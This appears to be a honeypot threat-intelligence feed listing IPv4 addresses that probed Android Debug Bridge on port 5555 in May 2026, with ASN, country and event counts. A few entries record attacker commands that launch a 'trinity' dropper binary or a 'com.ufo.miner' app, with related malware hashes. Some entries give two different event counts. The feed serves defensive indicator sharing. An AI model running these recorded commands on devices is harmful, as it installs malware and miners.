IPv4	183.91.202.141	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=KR; asn=9976; asn_org=Namincheon Brodcasting Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-21T04:31:45.000Z \| last_seen=2026-05-21T04:32:53.201Z \| ports=5555 \| cc=KR \| asn=9976 \| org=Namincheon Brodcasting Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	210.178.250.146	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-21T06:03:50.000Z \| last_seen=2026-05-21T06:13:55.692Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	185.141.119.91	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-21T07:37:08.000Z \| last_seen=2026-05-21T07:47:23.213Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	123.149.6.113	Attacker IP • ADB / seen in ADBHoney; events=62; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=22; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=62 \| first_seen=2026-05-21T08:15:26.000Z \| last_seen=2026-05-21T08:31:22.876Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-21
IPv4	20.221.68.74	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=35 \| first_seen=2026-05-21T08:20:08.000Z \| last_seen=2026-05-21T08:31:10.919Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	204.76.203.73	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-21T08:23:05.000Z \| last_seen=2026-05-21T08:24:33.714Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	157.245.218.191	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-21T11:43:41.000Z \| last_seen=2026-05-21T11:53:55.052Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	66.132.195.124	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-21T15:33:13.000Z \| last_seen=2026-05-21T15:34:31.966Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	5.161.239.0	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=213230; asn_org=Hetzner Online GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-21T23:57:21.000Z \| last_seen=2026-05-21T23:58:27.852Z \| ports=5555 \| cc=US \| asn=213230 \| org=Hetzner Online GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	67.207.85.254	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-22T01:04:21.000Z \| last_seen=2026-05-22T01:05:23.754Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	47.245.143.10	Attacker IP • ADB / seen in ADBHoney; events=52; ports=5555; cc=DE; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=2 Observed in ADBHoney telemetry for 2026-05. events=52 \| first_seen=2026-05-22T03:53:20.000Z \| last_seen=2026-05-22T03:55:18.731Z \| ports=5555 \| cc=DE \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	198.235.24.74	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-22T04:35:21.000Z \| last_seen=2026-05-22T04:46:48.157Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	194.127.167.102	Attacker IP • ADB / seen in ADBHoney; events=38; ports=5555; cc=EE; asn=43357; asn_org=Owl Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-22T06:21:03.000Z \| last_seen=2026-05-22T06:31:32.646Z \| ports=5555 \| cc=EE \| asn=43357 \| org=Owl Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	113.14.101.219	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=134419; asn_org=Beihai; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-22T08:21:57.000Z \| last_seen=2026-05-22T08:23:37.830Z \| ports=5555 \| cc=CN \| asn=134419 \| org=Beihai	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	85.90.246.159	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-22T08:41:21.000Z \| last_seen=2026-05-29T02:44:00.274Z \| ports=5555 \| cc=DE \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	64.62.156.153	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-22T11:07:28.000Z \| last_seen=2026-05-22T11:08:29.237Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	159.223.179.186	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-22T15:17:03.000Z \| last_seen=2026-05-22T15:18:08.583Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	167.99.154.106	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-22T15:56:01.000Z \| last_seen=2026-05-22T15:57:06.606Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	143.42.164.34	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-22T16:02:46.000Z \| last_seen=2026-05-22T16:03:47.650Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	66.132.172.128	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-22T16:32:01.000Z \| last_seen=2026-05-22T16:33:18.343Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-22
IPv4	45.74.59.3	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-22T23:16:17.000Z \| last_seen=2026-05-23T08:51:16.080Z \| ports=5555 \| cc=US \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	65.49.1.102	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-23T00:35:06.000Z \| last_seen=2026-05-23T00:36:14.516Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	198.12.106.59	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=36352; asn_org=HostPapa; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-23T05:25:03.000Z \| last_seen=2026-05-23T05:35:26.544Z \| ports=5555 \| cc=US \| asn=36352 \| org=HostPapa	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	198.235.24.81	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-23T06:18:15.000Z \| last_seen=2026-05-23T06:19:22.101Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	112.224.151.187	Attacker IP • ADB / seen in ADBHoney; events=60; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=28; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=60 \| first_seen=2026-05-23T07:03:04.000Z \| last_seen=2026-05-23T07:16:36.862Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-23
IPv4	111.113.89.210	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-23T09:14:52.000Z \| last_seen=2026-05-23T09:25:09.437Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	112.94.191.160	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=17622; asn_org=China Unicom Guangzhou network; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-23T09:14:27.000Z \| last_seen=2026-05-23T09:24:44.571Z \| ports=5555 \| cc=CN \| asn=17622 \| org=China Unicom Guangzhou network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	113.57.184.74	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-23T09:13:42.000Z \| last_seen=2026-05-23T09:14:45.451Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	118.212.122.205	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-23T09:14:08.000Z \| last_seen=2026-05-23T09:24:20.713Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	120.36.16.199	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-23T09:14:25.000Z \| last_seen=2026-05-23T09:15:28.188Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	175.30.48.58	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-23T09:13:53.000Z \| last_seen=2026-05-23T09:24:01.734Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	182.119.228.101	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-23T09:14:44.000Z \| last_seen=2026-05-23T09:24:59.497Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	220.250.11.32	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-23T09:13:44.000Z \| last_seen=2026-05-23T09:24:05.715Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	43.248.109.164	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-23T09:14:16.000Z \| last_seen=2026-05-23T09:24:31.634Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	118.112.211.143	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-23T10:02:11.000Z \| last_seen=2026-05-23T10:12:20.828Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	167.172.39.154	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-23T10:12:58.000Z \| last_seen=2026-05-23T10:23:13.088Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	65.49.20.67	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-23T11:04:19.000Z \| last_seen=2026-05-30T04:04:29.244Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	65.49.20.79	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-23T11:03:51.000Z \| last_seen=2026-05-23T11:04:53.294Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	172.110.223.171	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=PH; asn=47154; asn_org=Husam A. H. Hijazi; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-23T13:08:47.000Z \| last_seen=2026-05-24T13:14:58.879Z \| ports=5555 \| cc=PH \| asn=47154 \| org=Husam A. H. Hijazi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	172.236.111.128	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-23T15:49:54.000Z \| last_seen=2026-05-23T15:50:54.974Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	66.132.172.111	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-23T17:34:14.000Z \| last_seen=2026-05-23T17:35:34.414Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	162.243.59.115	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-23T18:45:51.000Z \| last_seen=2026-05-23T18:47:01.329Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	198.235.24.236	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-23T18:28:42.000Z \| last_seen=2026-05-23T18:40:06.286Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	185.141.119.73	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-22T14:35:26.000Z \| last_seen=2026-05-23T21:54:21.659Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-23
IPv4	77.91.71.66	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=GE; asn=211486; asn_org=Alferov Aleksey Aleksandrovich; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-23T23:27:05.000Z \| last_seen=2026-05-23T23:28:44.054Z \| ports=5555 \| cc=GE \| asn=211486 \| org=Alferov Aleksey Aleksandrovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	14.63.84.223	Attacker IP • ADB / seen in ADBHoney; events=27; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=2; cmd="am start -n com.ufo.miner/com.example.test.MainActivity" Observed in ADBHoney telemetry for 2026-05. events=29 \| first_seen=2026-05-24T00:49:59.000Z \| last_seen=2026-05-24T01:00:29.040Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	45.74.59.2	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=202412; asn_org=Omegatech LTD; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=34 \| first_seen=2026-05-24T01:36:03.000Z \| last_seen=2026-05-27T18:08:18.486Z \| ports=5555 \| cc=US \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	92.63.197.22	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-24T01:22:11.000Z \| last_seen=2026-05-24T01:23:23.537Z \| ports=5555 \| cc=UA \| asn=211736 \| org=FOP Dmytro Nedilskyi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	152.32.216.28	Attacker IP • ADB / seen in ADBHoney; events=103; ports=5555; cc=HK; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=103 \| first_seen=2026-05-24T03:05:07.000Z \| last_seen=2026-05-24T03:39:04.154Z \| ports=5555 \| cc=HK \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	178.128.66.56	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-24T03:36:48.000Z \| last_seen=2026-05-24T03:46:58.902Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	95.111.230.33	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-24T03:52:05.000Z \| last_seen=2026-05-27T09:23:38.176Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	68.183.48.162	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-24T04:10:16.000Z \| last_seen=2026-05-24T04:11:19.014Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	66.132.195.152	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-24T08:43:54.000Z \| last_seen=2026-05-24T08:45:33.332Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	213.232.235.199	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=MD; asn=200019; asn_org=Alexhost Srl; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=35 \| first_seen=2026-05-24T09:10:56.000Z \| last_seen=2026-05-24T09:22:50.742Z \| ports=5555 \| cc=MD \| asn=200019 \| org=Alexhost Srl	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	222.138.108.98	Attacker IP • ADB / seen in ADBHoney; events=57; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=57 \| first_seen=2026-05-24T10:07:45.000Z \| last_seen=2026-05-24T10:21:17.196Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-24
IPv4	64.62.156.66	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-24T12:12:50.000Z \| last_seen=2026-05-24T12:22:56.719Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	64.62.156.79	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-24T12:11:38.000Z \| last_seen=2026-05-24T12:12:45.611Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	20.65.193.137	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-24T13:18:38.000Z \| last_seen=2026-05-24T13:30:22.554Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	119.135.58.1	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-24T15:53:05.000Z \| last_seen=2026-05-24T15:54:13.660Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	172.234.25.243	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-24T15:57:53.000Z \| last_seen=2026-05-24T15:58:55.306Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	173.255.242.196	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-24T15:58:22.000Z \| last_seen=2026-05-29T15:57:34.280Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
